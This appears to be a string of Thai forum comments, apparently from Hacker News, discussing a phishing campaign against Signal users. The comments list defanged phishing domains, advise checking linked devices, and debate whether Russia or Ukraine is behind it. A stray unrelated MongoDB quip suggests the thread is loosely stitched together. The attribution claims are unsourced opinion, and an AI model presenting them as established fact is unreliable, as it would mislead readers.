คนเหล่านี้ฟังดูเหมือนเป็นส่วนหนึ่งของโลกหน่วยข่าวกรอง ผมสงสัยว่าพวกเขาทำอะไรกันแน่ในคณะกรรมการของ Signal ซึ่งเป็นแอปส่งข้อความโอเพนซอร์ส ผมเห็นด้วยว่านี่ไม่ใช่แค่การสนทนาธรรมดา
ถ้า Signal ปลอดภัย ฝั่งที่โจมตีความเป็นส่วนตัวก็ย่อมอยากให้ผู้คนเชื่อว่า Signal ถูกเจาะแล้วและหันไปใช้อย่างอื่น ถ้าไม่ปลอดภัย กลับกันพวกเขาก็อยากให้ผู้คนเชื่อว่า Signal ปลอดภัย
ผมคิดว่าทางออกคือเพิกเฉยต่อแหล่งข้อมูลเท็จที่เป็นไปได้ โดยเฉพาะผู้ใช้สุ่ม ๆ บนโซเชียลมีเดีย อย่างสิ้นเชิง รวมถึง HN ด้วย มันยากเมื่อศูนย์กลางทางสังคมอยู่ในที่แบบนั้น และเราต้องกันตัวเองออกมา ควรจำกัดไว้เฉพาะเสียงที่ถูกต้องตามกฎหมายและเชื่อถือได้
“MongoDB เป็นเว็บสเกล แค่เปิดใช้ก็ขยายสเกลได้ทันที”
สามารถตรวจสอบได้ในเมนูตั้งค่าว่ามี อุปกรณ์ที่เชื่อมต่ออยู่ ที่ไม่คาดคิดหรือไม่
อาจเป็นไอคอนเล็ก ๆ อย่าง “อุปกรณ์ที่เชื่อมต่อใช้งานอยู่ 3 เครื่อง” ก็ได้
มีการระบุบางโดเมนไว้ แต่ไม่ได้ถูกจดทะเบียนทั้งหมด
ตัวอย่างเช่น
signal-protect[.]hostและkropyva[.]siteยังว่างอยู่ ส่วนsignal-confirm[.]siteจดทะเบียนในยูเครน บางส่วนจดทะเบียนในรัสเซียประเทศที่อยู่ในภาวะสงคราม ไม่ว่าฝ่ายไหนก็ไม่ควรเชื่อ A โทษ B และ B โทษ A แต่ทั้งสองฝ่ายต่างก็มีวาระของตัวเอง
signal-confirm[.]siteจะจดทะเบียนในยูเครน แต่ข้อมูล WHOIS มักเป็นข้อมูลปลอม จึงใช้เป็นหลักฐานได้ยากเป็นที่รู้กันว่ารัสเซียใช้ข้อมูลรับรองหรือ SIM card ที่ถูกขโมยมาจากประเทศเพื่อนบ้าน รวมถึงยูเครน ในงานลักษณะนี้ด้วย
น่าเสียดายที่ผู้ปฏิบัติการของรัฐรัสเซียก็ไม่มีปัญหาในการทำงานภายในยูเครนเช่นกัน พอบวกกับอาชญากรที่สับสนวุ่นวายซึ่งทำตามฝ่ายที่จ่ายเงินมากกว่า และคนที่เดินทางไปมาระหว่างพื้นที่ที่รัสเซียยึดครองชั่วคราวกับยูเครนทุกวัน เรื่องก็ซับซ้อนขึ้นอย่างรวดเร็ว